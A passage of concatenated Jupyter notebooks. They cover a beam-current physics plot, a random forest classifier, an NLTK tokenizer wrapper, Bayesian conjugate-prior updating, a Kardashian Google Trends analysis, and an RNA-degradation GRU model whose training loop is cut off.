curr = get_zcurrent_new(fall[i]['beam'][:,4],fall[i]['beam'][:,5],zmesh,beam.sw,dz)
current_history.append(curr)
current_history = np.asarray(current_history)
#Plot the current across gap at a single time
fig5 = plt.figure(figsize=(16,6))
#scalings
h_scale = 1.e6
y_range_max = beam.ibeam*1.e3*1.2
#current plotted from grid
plt.plot(zmesh*h_scale,np.array(current_history[-1])*1e3,'k')
#Compute and plot idealized currents as needed
RD_ideal = np.ones(len(zmesh))*sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area
JCL_ideal = np.ones(len(zmesh))*cl_limit*cathode_area
if (RD_ideal[0]*1e3 <= y_range_max):
plt.plot(zmesh*h_scale,RD_ideal*1.e3,'r--',label=r'Richardson-Dushman')
if (JCL_ideal[0]*1e3 <= y_range_max):
plt.plot(zmesh*h_scale,JCL_ideal*1.e3,'b--',label=r'I$_{cl}$ cold limit')
#labels and legends
plt.xlabel("z ($\mu$m)",fontsize='16')
plt.ylabel("current (mA)",fontsize='16')
plt.title("Current - {:.4E}s".format(fall[num_steps]['time']),fontsize=18)
plt.xlim(Z_MIN,Z_MAX*1.e6)
plt.ylim(0, y_range_max)
plt.legend(loc=4)
title = 'current_{:.4f}ps-test.pdf'.format(CATHODE_TEMP,fall[num_steps]['time']*1.e9)
#fig5.savefig(title,bbox_inches='tight')
###Output
_____no_output_____ |
RandomForest_Classifier.ipynb | ###Markdown
Importing data
###Code
data=pd.read_csv('Social_Network_Ads.csv')
print(data.head())
data.describe()
###Output
_____no_output_____
###Markdown
Checking null values
###Code
data.isnull().sum()
###Output
_____no_output_____
###Markdown
Splitting data
###Code
from sklearn.model_selection import train_test_split
x=data.iloc[:,:-1].values
y=data.iloc[:,-1].values.reshape(-1,1)
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.25,random_state=0)
###Output
_____no_output_____
###Markdown
Feature Scaling
###Code
from sklearn.preprocessing import StandardScaler
sc=StandardScaler()
x_train=sc.fit_transform(x_train)
x_test=sc.transform(x_test)
###Output
_____no_output_____
###Markdown
Model Build and Train
###Code
from sklearn.ensemble import RandomForestClassifier
rmc=RandomForestClassifier(n_estimators=100,criterion='entropy',random_state=0)
rmc.fit(x_train,y_train)
rmc.score(x_train,y_train)
###Output
_____no_output_____
###Markdown
prediction using model
###Code
y_pred=rmc.predict(x_test).reshape(-1,1)
print(np.concatenate((y_test,y_pred),axis=1))
###Output
[[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[0 0]
[0 1]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 1]
[0 1]
[0 0]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[1 1]
[0 0]
[1 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[1 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[1 1]
[1 1]
[0 0]
[0 0]
[0 0]
[1 1]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[1 1]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 1]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[0 0]
[1 1]
[1 1]
[1 1]
[0 1]
[0 0]
[0 0]
[1 1]
[1 0]
[0 0]
[1 1]
[1 1]
[0 0]
[0 0]
[1 1]
[0 0]
[0 0]
[0 0]
[1 0]
[0 0]
[1 1]
[1 1]
[1 1]]
###Markdown
Model Accuracy
###Code
from sklearn.metrics import accuracy_score
accuracy_score(y_test,y_pred)
###Output
_____no_output_____
###Markdown
Confusion Matrix
###Code
from sklearn.metrics import confusion_matrix
confusion_matrix(y_test,y_pred)
###Output
_____no_output_____ |
tomef/tokenizer/pt_tokenizer.py.ipynb | ###Markdown
PT Tokenizer ← ↑This is a wrapper around the Penn Treebank tokenizer provided by the NLTK.For more information see https://www.nltk.org/api/nltk.tokenize.html--- Setup and Settings---
###Code
from __init__ import init_vars
init_vars(vars())
import nltk
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
from nltk.tokenize import word_tokenize
import tokenizer.common
from tokenizer.token_util import TokenizerBase
###Output
_____no_output_____
###Markdown
--- Build PTTokenizer class---
###Code
class PTTokenizer(TokenizerBase):
def tokenize(self, text, *args):
text = text.replace(tokenizer.common.separator_token,tokenizer.common.separator_token_replacement)
return word_tokenize(text)
###Output
_____no_output_____ |
10_bayesian_machine_learning/01_updating_conjugate_priors.ipynb | ###Markdown
Bayesian Updating with Conjugate Priors When the data consists of binary Bernoulli random variables with a certain success probability for a positive outcome, the number of successes in repeated trials follows a Binomial distribution. The conjugate prior is the Beta distribution with support over the interval [0, 1] and two shape parameters to model arbitrary prior distributions over the success probability. Hence, the posterior distribution is also a Beta distribution that we can derive by directly updating the parameters. Setup
###Code
import warnings
warnings.filterwarnings('ignore')
%matplotlib inline
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
import scipy.stats as stats
from matplotlib.ticker import FuncFormatter
import matplotlib as mpl
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}']
np.random.seed(42)
sns.set_style('dark')
###Output
_____no_output_____
###Markdown
Formatting Helper
###Code
def format_plot(axes, i, p, y, trials, success, true_p, tmle, tmap=None):
fmt = FuncFormatter(lambda x, _: f'{x:.0%}')
if i >= 6:
axes[i].set_xlabel("$p$, Success Probability")
axes[i].xaxis.set_major_formatter(fmt)
else:
axes[i].axes.get_xaxis().set_visible(False)
if i % 3 == 0:
axes[i].set_ylabel("Posterior Probability")
axes[i].set_yticks([], [])
axes[i].plot(p, y, lw=1, c='k')
axes[i].fill_between(p, y, color='darkblue', alpha=0.4)
axes[i].vlines(true_p, 0, max(10, np.max(y)), color='k', linestyle='--', lw=1)
axes[i].set_title(f'Trials: {trials:,d} - Success: {success:,d}')
if i > 0:
smle = r"$\theta_{{\mathrm{{MLE}}}}$ = {:.2%}".format(tmle)
axes[i].text(x=.02, y=.85, s=smle, transform=axes[i].transAxes)
smap = r"$\theta_{{\mathrm{{MAP}}}}$ = {:.2%}".format(tmap)
axes[i].text(x=.02, y=.75, s=smap, transform=axes[i].transAxes)
return axes[i]
###Output
_____no_output_____
###Markdown
Simulate Coin Tosses & Updates of Posterior
###Code
n_trials = [0, 1, 3, 5, 10, 25, 50, 100, 500]
outcomes = stats.bernoulli.rvs(p=0.5, size=n_trials[-1])
p = np.linspace(0, 1, 100)
# uniform (uninformative) prior
a = b = 1
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True)
axes = axes.flatten()
fmt = FuncFormatter(lambda x, _: f'{x:.0%}')
for i, trials in enumerate(n_trials):
successes = outcomes[:trials]
theta_mle = np.mean(successes)
heads = sum(successes)
tails = trials - heads
update = stats.beta.pdf(p, a + heads , b + tails)
theta_map = pd.Series(update, index=p).idxmax()
axes[i] = format_plot(axes, i, p, update, trials=trials, success=heads,
true_p=.5, tmle=theta_mle, tmap=theta_map)
title = 'Bayesian Probabilities: Updating the Posterior'
fig.suptitle(title, y=1.02, fontsize=14)
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Stock Price Moves We will collect samples of different sizes of binarized daily S&P 500 returns where the positive outcome is a price increase. Starting from an uninformative prior that allocates equal probability to each possible success probability in the interval [0, 1], we compute the posterior for different evidence samples.
###Code
sp500_returns = pd.read_hdf('../data/assets.h5', key='sp500/fred').loc['2010':, 'close']
sp500_binary = (sp500_returns.pct_change().dropna() > 0).astype(int)
###Output
_____no_output_____
###Markdown
The following code sample shows that the update consists in simply adding the observed numbers of success and failure to the parameters of the prior distribution to obtain the posterior.The resulting posterior distributions are plotted below. They illustrate the evolution from a uniform prior that views all success probabilities as equally likely to an increasingly peaked distribution.After 500 samples, the probability is concentrated near the actual probability of a positive move at 54.7% from 2010 to 2017. It also shows the small differences between MLE and MAP estimates, where the latter tends to be pulled slightly towards the expected value of the uniform prior.
###Code
n_days = [0, 1, 3, 5, 10, 25, 50, 100, 500]
# random sample of trading days
# outcomes = sp500_binary.sample(n_days[-1])
# initial 500 trading days
outcomes = sp500_binary.iloc[:n_days[-1]]
p = np.linspace(0, 1, 100)
# uniform (uninformative) prior
a = b = 1
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True)
axes = axes.flatten()
for i, days in enumerate(n_days):
successes = outcomes.iloc[:days]
theta_mle = successes.mean()
up = successes.sum()
down = days - up
update = stats.beta.pdf(p, a + up , b + down)
theta_map = pd.Series(update, index=p).idxmax()
axes[i] = format_plot(axes, i, p, update, trials=days, success=up,
true_p=sp500_binary.mean(), tmle=theta_mle, tmap=theta_map)
title = 'Bayesian Probabilities: Updating the Posterior'
fig.suptitle(title, y=1.02, fontsize=14)
fig.tight_layout()
###Output
_____no_output_____ |
_notebooks/2020-08-20-01-Up-and-Down-With-the-Kardashians.ipynb | ###Markdown
Up and Down With the Kardashians> While I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content. In this Project, you will explore the data underneath the hype in the form of search interest data from Google Trends. You'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of your own. And you'll answer the big question - "is Kim even the most famous sister anymore?" This is the Result of Project "Up and Down With the Kardashians", via datacamp.- toc: true - badges: true- comments: true- author: Chanseok Kang- categories: [Python, Datacamp, Data_Science, Visualization]- image: images/kardashian_jenner_family_tree.png 1. The sisters and Google TrendsWhile I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content.The sisters in particular over the past decade have been especially productive in this regard. Let's get some facts straight. I consider the "sisters" to be the following daughters of Kris Jenner. Three from her first marriage to lawyer Robert Kardashian:Kourtney Kardashian (daughter of Robert Kardashian, born in 1979)Kim Kardashian (daughter of Robert Kardashian, born in 1980)Khloé Kardashian (daughter of Robert Kardashian, born in 1984)And two from her second marriage to Olympic gold medal-winning decathlete, Caitlyn Jenner (formerly Bruce):Kendall Jenner (daughter of Caitlyn Jenner, born in 1995)Kylie Jenner (daughter of Caitlyn Jenner, born in 1997)This family tree can be confusing, but we aren't here to explain it. We're here to explore the data underneath the hype, and we'll do it using search interest data from Google Trends. We'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of our own. And we'll answer the big question: is Kim even the most famous sister anymore?First, let's load and inspect our Google Trends data, which was downloaded in CSV form. The query parameters: each of the sisters, worldwide search data, 2007 to present day. (2007 was the year Kim became "active" according to Wikipedia.)
###Code
import matplotlib.pyplot as plt
import pandas as pd
plt.rcParams['figure.figsize'] = (10, 8)
# Read in dataset
trends = pd.read_csv('./dataset/trends_kj_sisters.csv')
# Inspect data
trends.head()
###Output
_____no_output_____
###Markdown
2. Better "kolumn" namesSo we have a column for each month since January 2007 and a column for the worldwide search interest for each of the sisters each month. By the way, Google defines the values of search interest as: Numbers represent search interest relative to the highest point on the chart for the given region and time. A value of 100 is the peak popularity for the term. A value of 50 means that the term is half as popular. A score of 0 means there was not enough data for this term.Okay, that's great Google, but you are not making this data easily analyzable for us. I see a few things. Let's do the column names first. A column named "Kim Kardashian: (Worldwide)" is not the most usable for coding purposes. Let's shorten those so we can access their values better. Might as well standardize all column formats, too. I like lowercase, short column names.
###Code
# Make column names easier to work with
trends.columns = ['month', 'kim', 'khloe', 'kourtney', 'kendall', 'kylie']
# Inspect data
trends.head()
###Output
_____no_output_____
###Markdown
3. Pesky data typesThat's better. We don't need to scroll our eyes across the table to read the values anymore since it is much less wide. And seeing five columns that all start with the letter "k" … the aesthetics … we should call them "kolumns" now! (Bad joke.)The next thing I see that is going to be an issue is that "<" sign. If "a score of 0 means there was not enough data for this term," "<1" must mean it is between 0 and 1 and Google does not want to give us the fraction from google.trends.com for whatever reason. That's fine, but this "<" sign means we won't be able to analyze or visualize our data right away because those column values aren't going to be represented as numbers in our data structure. Let's confirm that by inspecting our data types.
###Code
# Inspect data types
trends.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null object
1 kim 147 non-null int64
2 khloe 147 non-null object
3 kourtney 147 non-null object
4 kendall 147 non-null object
5 kylie 147 non-null int64
dtypes: int64(2), object(4)
memory usage: 7.0+ KB
###Markdown
4. From object to integerYes, okay, the khloe, kourtney, and kendall columns aren't integers like the kim and kylie columns are. Again, because of the "<" sign that indicates a search interest value between zero and one. Is this an early hint at the hierarchy of sister popularity? We'll see shortly. Before that, we'll need to remove that pesky "<" sign. Then we can change the type of those columns to integer.
###Code
# Loop through columns
for column in trends.columns:
# Only modify columns that have the "<" sign
if "<" in trends[column].to_string():
# Remove "<" and convert dtype to integer
trends[column] = trends[column].str.replace("<", "")
trends[column] = pd.to_numeric(trends[column])
# Inspect data types and data
trends.info()
trends.head()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null object
1 kim 147 non-null int64
2 khloe 147 non-null int64
3 kourtney 147 non-null int64
4 kendall 147 non-null int64
5 kylie 147 non-null int64
dtypes: int64(5), object(1)
memory usage: 7.0+ KB
###Markdown
5. From object to datetimeOkay, great, no more "<" signs. All the sister columns are of integer type.Now let's convert our month column from type object to datetime to make our date data more accessible.
###Code
# Convert month to type datetime
trends['month'] = pd.to_datetime(trends['month'])
# Inspect data types and data
trends.info()
trends.head()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null datetime64[ns]
1 kim 147 non-null int64
2 khloe 147 non-null int64
3 kourtney 147 non-null int64
4 kendall 147 non-null int64
5 kylie 147 non-null int64
dtypes: datetime64[ns](1), int64(5)
memory usage: 7.0 KB
###Markdown
6. Set month as indexAnd finally, let's set the month column as our index to wrap our data cleaning. Having month as index rather than the zero-based row numbers will allow us to write shorter lines of code to create plots, where month will represent our x-axis.
###Code
# Set month as DataFrame index
trends = trends.set_index('month')
# Inspect the data
trends.head()
###Output
_____no_output_____
###Markdown
7. The early Kim hypeOkay! So our data is ready to plot. Because we cleaned our data, we only need one line of code (and just thirteen characters!) to remake the Google Trends chart, plus another line to make the plot show up in our notebook.
###Code
# Plot search interest vs. month
%matplotlib inline
fig, ax = plt.subplots(figsize=(10, 8))
trends.plot(ax=ax);
###Output
_____no_output_____
###Markdown
8. Kylie's riseOh my! There is so much to make sense of here. Kim's sharp rise in 2007, with the beginning of Keeping Up with the Kardashians, among other things. There was no significant search interest for the other four sisters until mid-2009 when Kourtney and Khloé launched the reality television series, Kourtney and Khloé Take Miami. Then there was Kim's rise from famous to literally more famous than God in 2011. This Cosmopolitan article covers the timeline that includes the launch of music videos, fragrances, iPhone and Android games, another television series, joining Instagram, and more. Then there was Kim's ridiculous spike in December 2014: posing naked on the cover of Paper Magazine in a bid to break the internet will do that for you.A curious thing starts to happen after that bid as well. Let's zoom in…
###Code
# Zoom in from January 2014
fig, ax = plt.subplots(figsize=(10, 8))
trends.loc['2014-01':'2019-03'].plot(ax=ax);
###Output
_____no_output_____
###Markdown
9. Smooth out the fluctuations with rolling meansIt looks like my suspicion may be true: Kim is not always the most searched Kardashian or Jenner sister. Since late-2016, at various months, Kylie overtakes Kim. Two big spikes where she smashed Kim's search interest: in September 2017 when it was reported that Kylie was expecting her first child with rapper Travis Scott and in February 2018 when she gave birth to her daughter, Stormi Webster. The continued success of Kylie Cosmetics has kept her in the news, not to mention making her the "The Youngest Self-Made Billionaire Ever" according to Forbes.These fluctuations are descriptive but do not really help us answer our question: is Kim even the most famous sister anymore? We can use rolling means to smooth out short-term fluctuations in time series data and highlight long-term trends. Let's make the window twelve months a.k.a. one year.
###Code
# Smooth the data with rolling means
fig, ax = plt.subplots(figsize=(10, 8))
trends.rolling(window=12).mean().plot(ax=ax);
###Output
_____no_output_____
###Markdown
10. Who's more famous? The Kardashians or the Jenners?Whoa, okay! So by this metric, Kim is still the most famous sister despite Kylie being close and nearly taking her crown. Honestly, the biggest takeaway from this whole exercise might be Kendall not showing up that much. It makes sense, though, despite her wildly successful modeling career. Some have called her "the only normal one in her family" as she tends to shy away from the more dramatic and controversial parts of the media limelight that generate oh so many clicks.Let's end this analysis with one last plot. In it, we will plot (pun!) the Kardashian sisters against the Jenner sisters to see which family line is more popular now. We will use average search interest to make things fair, i.e., total search interest divided by the number of sisters in the family line.The answer? Since 2015, it has been a toss-up. And in the future? With this family and their penchant for big events, who knows?
###Code
# Average search interest for each family line
trends['kardashian'] = trends[['kim', 'khloe', 'kourtney']].sum(axis=1) / 3
trends['jenner'] = trends[['kendall', 'kylie']].sum(axis=1) / 2
# Plot average family line search interest vs. month
fig, ax = plt.subplots(figsize=(10, 8))
trends[['kardashian', 'jenner']].plot(ax=ax);
###Output
_____no_output_____ |
Model backlog/Models/88-openvaccine-6xconv-bigru-aug-sampling-5-v2.ipynb | ###Markdown
Dependencies
###Code
from openvaccine_scripts import *
import warnings, json
from sklearn.model_selection import KFold, StratifiedKFold, GroupKFold
import tensorflow.keras.layers as L
import tensorflow.keras.backend as K
from tensorflow.keras import optimizers, losses, Model
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau
SEED = 0
seed_everything(SEED)
warnings.filterwarnings('ignore')
###Output
_____no_output_____
###Markdown
Model parameters
###Code
config = {
"BATCH_SIZE": 32,
"EPOCHS": 70,
"LEARNING_RATE": 1e-3,
"ES_PATIENCE": 10,
"N_FOLDS": 5,
"N_USED_FOLDS": 5,
"PB_SEQ_LEN": 107,
"PV_SEQ_LEN": 130,
}
with open('config.json', 'w') as json_file:
json.dump(json.loads(json.dumps(config)), json_file)
config
###Output
_____no_output_____
###Markdown
Load data
###Code
database_base_path = '/kaggle/input/stanford-covid-vaccine/'
train = pd.read_json(database_base_path + 'train.json', lines=True)
test = pd.read_json(database_base_path + 'test.json', lines=True)
print('Train samples: %d' % len(train))
display(train.head())
print(f'Test samples: {len(test)}')
display(test.head())
###Output
Train samples: 2400
###Markdown
Data augmentation
###Code
def aug_data(df):
target_df = df.copy()
new_df = aug_df[aug_df['id'].isin(target_df['id'])]
del target_df['structure']
del target_df['predicted_loop_type']
new_df = new_df.merge(target_df, on=['id','sequence'], how='left')
df['cnt'] = df['id'].map(new_df[['id','cnt']].set_index('id').to_dict()['cnt'])
df['log_gamma'] = 100
df['score'] = 1.0
new_df['augmented'] = True
df['augmented'] = False
df = df.append(new_df[df.columns])
return df
# Augmented data
aug_df = pd.read_csv('/kaggle/input/augmented-data-for-stanford-covid-vaccine/48k_augment.csv')
print(f'Augmented samples: {len(aug_df)}')
display(aug_df.head())
print(f"Samples in train before augmentation: {len(train)}")
# print(f"Samples in test before augmentation: {len(test)}")
train = aug_data(train)
train.drop('index', axis=1, inplace=True)
train = train.reset_index()
# test = aug_data(test)
print(f"Samples in train after augmentation: {len(train)}")
# print(f"Samples in test after augmentation: {len(test)}")
print(f"Unique id in train: {len(train['id'].unique())}")
print(f"Unique sequences in train: {len(train['sequence'].unique())}")
print(f"Unique structure in train: {len(train['structure'].unique())}")
print(f"Unique predicted_loop_type in train: {len(train['predicted_loop_type'].unique())}")
# print(f"Unique sequences in test: {len(test['sequence'].unique())}")
###Output
Augmented samples: 48401
###Markdown
Auxiliary functions
###Code
def get_dataset(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0):
input_map = {'inputs_seq': x['sequence'],
'inputs_struct': x['structure'],
'inputs_loop': x['predicted_loop_type'],
'inputs_bpps_max': x['bpps_max'],
'inputs_bpps_sum': x['bpps_sum'],
'inputs_bpps_scaled': x['bpps_scaled']}
if labeled:
output_map = {'output_react': y['reactivity'],
'output_bg_ph': y['deg_Mg_pH10'],
'output_ph': y['deg_pH10'],
'output_mg_c': y['deg_Mg_50C'],
'output_c': y['deg_50C']}
if sample_weights is not None:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map))
if repeated:
dataset = dataset.repeat()
if shuffled:
dataset = dataset.shuffle(2048, seed=seed)
dataset = dataset.batch(batch_size)
dataset = dataset.prefetch(buffer_size)
return dataset
def get_dataset_sampling(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0):
input_map = {'inputs_seq': x['sequence'],
'inputs_struct': x['structure'],
'inputs_loop': x['predicted_loop_type'],
'inputs_bpps_max': x['bpps_max'],
'inputs_bpps_sum': x['bpps_sum'],
'inputs_bpps_scaled': x['bpps_scaled']}
if labeled:
output_map = {'output_react': y['reactivity'],
'output_bg_ph': y['deg_Mg_pH10'],
'output_ph': y['deg_pH10'],
'output_mg_c': y['deg_Mg_50C'],
'output_c': y['deg_50C']}
if sample_weights is not None:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map))
if repeated:
dataset = dataset.repeat()
if shuffled:
dataset = dataset.shuffle(2048, seed=seed)
return dataset
###Output
_____no_output_____
###Markdown
Pre-process
###Code
# Add bpps as features
train = add_bpps_features(train, database_base_path)
test = add_bpps_features(test, database_base_path)
feature_cols = ['sequence', 'structure', 'predicted_loop_type', 'bpps_max', 'bpps_sum', 'bpps_scaled']
pred_cols = ['reactivity', 'deg_Mg_pH10', 'deg_pH10', 'deg_Mg_50C', 'deg_50C']
encoder_list = [token2int_seq, token2int_struct, token2int_loop, None, None, None]
public_test = test.query("seq_length == 107").copy()
private_test = test.query("seq_length == 130").copy()
x_test_public = get_features_dict(public_test, feature_cols, encoder_list, public_test.index)
x_test_private = get_features_dict(private_test, feature_cols, encoder_list, private_test.index)
# To use as stratified col
train['signal_to_noise_int'] = train['signal_to_noise'].astype(int)
###Output
_____no_output_____
###Markdown
Model
###Code
def model_fn(hidden_dim=384, dropout=.5, pred_len=68, n_outputs=5):
inputs_seq = L.Input(shape=(None, 1), name='inputs_seq')
inputs_struct = L.Input(shape=(None, 1), name='inputs_struct')
inputs_loop = L.Input(shape=(None, 1), name='inputs_loop')
inputs_bpps_max = L.Input(shape=(None, 1), name='inputs_bpps_max')
inputs_bpps_sum = L.Input(shape=(None, 1), name='inputs_bpps_sum')
inputs_bpps_scaled = L.Input(shape=(None, 1), name='inputs_bpps_scaled')
def _one_hot(x, num_classes):
return K.squeeze(K.one_hot(K.cast(x, 'uint8'), num_classes=num_classes), axis=2)
ohe_seq = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_seq)}, input_shape=(None, 1))(inputs_seq)
ohe_struct = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_struct)}, input_shape=(None, 1))(inputs_struct)
ohe_loop = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_loop)}, input_shape=(None, 1))(inputs_loop)
### Encoder block
# Conv block
conv_seq = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_seq)
conv_struct = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_struct)
conv_loop = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_loop)
conv_bpps_max = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_max)
conv_bpps_sum = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_sum)
conv_bpps_scaled = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_scaled)
x_concat = L.concatenate([conv_seq, conv_struct, conv_loop, conv_bpps_max,
conv_bpps_sum, conv_bpps_scaled], axis=-1, name='conv_concatenate')
# Recurrent block
encoder, encoder_state_f, encoder_state_b = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True,
return_state=True, kernel_initializer='orthogonal'),
name='Encoder_RNN')(x_concat)
### Decoder block
decoder = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True, kernel_initializer='orthogonal'),
name='Decoder')(encoder, initial_state=[encoder_state_f, encoder_state_b])
# Since we are only making predictions on the first part of each sequence, we have to truncate it
decoder_truncated = decoder[:, :pred_len]
output_react = L.Dense(1, name='output_react')(decoder_truncated)
output_bg_ph = L.Dense(1, name='output_bg_ph')(decoder_truncated)
output_ph = L.Dense(1, name='output_ph')(decoder_truncated)
output_mg_c = L.Dense(1, name='output_mg_c')(decoder_truncated)
output_c = L.Dense(1, name='output_c')(decoder_truncated)
model = Model(inputs=[inputs_seq, inputs_struct, inputs_loop, inputs_bpps_max, inputs_bpps_sum, inputs_bpps_scaled],
outputs=[output_react, output_bg_ph, output_ph, output_mg_c, output_c])
opt = optimizers.Adam(learning_rate=config['LEARNING_RATE'])
model.compile(optimizer=opt, loss={'output_react': MCRMSE,
'output_bg_ph': MCRMSE,
'output_ph': MCRMSE,
'output_mg_c': MCRMSE,
'output_c': MCRMSE},
loss_weights={'output_react': 2.,
'output_bg_ph': 2.,
'output_ph': 1.,
'output_mg_c': 2.,
'output_c': 1.})
return model
model = model_fn()
model.summary()
###Output
Model: "functional_1"
__________________________________________________________________________________________________
Layer (type) Output Shape Param # Connected to
==================================================================================================
inputs_seq (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_struct (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_loop (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
lambda (Lambda) (None, None, 4) 0 inputs_seq[0][0]
__________________________________________________________________________________________________
lambda_1 (Lambda) (None, None, 3) 0 inputs_struct[0][0]
__________________________________________________________________________________________________
lambda_2 (Lambda) (None, None, 7) 0 inputs_loop[0][0]
__________________________________________________________________________________________________
inputs_bpps_max (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_bpps_sum (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_bpps_scaled (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
conv1d (Conv1D) (None, None, 64) 832 lambda[0][0]
__________________________________________________________________________________________________
conv1d_1 (Conv1D) (None, None, 64) 640 lambda_1[0][0]
__________________________________________________________________________________________________
conv1d_2 (Conv1D) (None, None, 64) 1408 lambda_2[0][0]
__________________________________________________________________________________________________
conv1d_3 (Conv1D) (None, None, 64) 256 inputs_bpps_max[0][0]
__________________________________________________________________________________________________
conv1d_4 (Conv1D) (None, None, 64) 256 inputs_bpps_sum[0][0]
__________________________________________________________________________________________________
conv1d_5 (Conv1D) (None, None, 64) 256 inputs_bpps_scaled[0][0]
__________________________________________________________________________________________________
conv_concatenate (Concatenate) (None, None, 384) 0 conv1d[0][0]
conv1d_1[0][0]
conv1d_2[0][0]
conv1d_3[0][0]
conv1d_4[0][0]
conv1d_5[0][0]
__________________________________________________________________________________________________
Encoder_RNN (Bidirectional) [(None, None, 768), 1774080 conv_concatenate[0][0]
__________________________________________________________________________________________________
Decoder (Bidirectional) (None, None, 768) 2658816 Encoder_RNN[0][0]
Encoder_RNN[0][1]
Encoder_RNN[0][2]
__________________________________________________________________________________________________
tf_op_layer_strided_slice (Tens [(None, None, 768)] 0 Decoder[0][0]
__________________________________________________________________________________________________
output_react (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_bg_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_mg_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
==================================================================================================
Total params: 4,440,389
Trainable params: 4,440,389
Non-trainable params: 0
__________________________________________________________________________________________________
###Markdown
Training
###Code
AUTO = tf.data.experimental.AUTOTUNE
skf = GroupKFold(n_splits=config['N_FOLDS'])
history_list = []
oof = train[['id', 'SN_filter', 'signal_to_noise'] + pred_cols].copy()
oof_preds = np.zeros((len(train), 68, len(pred_cols)))
test_public_preds = np.zeros((len(public_test), config['PB_SEQ_LEN'], len(pred_cols)))
test_private_preds = np.zeros((len(private_test), config['PV_SEQ_LEN'], len(pred_cols)))
for fold,(train_idx, valid_idx) in enumerate(skf.split(train, train['signal_to_noise_int'], train['id'])):
if fold >= config['N_USED_FOLDS']:
break
print(f'\nFOLD: {fold+1}')
# Create clean and noisy datasets
valid_clean_idxs = np.intersect1d(train[(train['SN_filter'] == 1) &
(train['augmented'] == False)].index, valid_idx)
### Create datasets
# x_train = get_features_dict(train, feature_cols, encoder_list, train_idx)
# y_train = get_targets_dict(train, pred_cols, train_idx)
# w_train = np.log(train.iloc[train_idx]['signal_to_noise'].values+1.2)+1
x_valid = get_features_dict(train, feature_cols, encoder_list, valid_clean_idxs)
y_valid = get_targets_dict(train, pred_cols, valid_clean_idxs)
w_valid = np.log(train.iloc[valid_clean_idxs]['signal_to_noise'].values+1.2)+1
# train_ds = get_dataset(x_train, y_train, w_train, labeled=True, shuffled=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
